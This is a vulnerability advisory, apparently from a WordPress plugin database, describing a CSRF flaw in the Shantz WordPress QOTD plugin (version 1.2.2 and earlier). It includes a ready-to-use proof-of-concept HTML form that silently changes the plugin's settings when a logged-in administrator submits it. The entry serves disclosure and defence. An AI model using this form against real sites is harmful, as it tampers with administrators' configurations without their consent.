WordPress Plugin Vulnerabilities

Shantz WordPress QOTD <= 1.2.2 - Arbitrary Setting Update via CSRF

Description

The plugin is lacking any CSRF check when updating its settings, allowing attackers to make logged in administrators change them to arbitrary values.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=shantz-wp-qotd.php" method="POST">
      <input type="hidden" name="shantzWpQotdEnable" value="true" />
      <input type="hidden" name="shantzWpQotdSrcBox" value="true" />
      <input type="hidden" name="shantzWpQotdSrcFile" value="false" />
      <input type="hidden" name="shantzWpQotdSeparator" value="" />
      <input type="hidden" name="shantzWpQotdDb" value="Quote via CSRF" />
      <input type="hidden" name="shantzWpQotdPattern" value="qottd" />
      <input type="hidden" name="shantzWpQotdAddAuto" value="true" />
      <input type="hidden" name="shantzWpQotdExcludePages" value="false" />
      <input type="hidden" name="shantzWpQotdAddBottom" value="true" />
      <input type="hidden" name="shantzWpQotdStaticTextBefore" value="" />
      <input type="hidden" name="shantzWpQotdStaticTextAfter" value="" />
      <input type="hidden" name="update_shantzWpQotdPluginSettings" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>

Affects Plugins

References

Classification

Miscellaneous

Original Researcher
Prashant Karman Patel
Submitter
Prashant Karman Patel
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2021-07-19 (about 2 years ago)
Added
2021-07-19 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other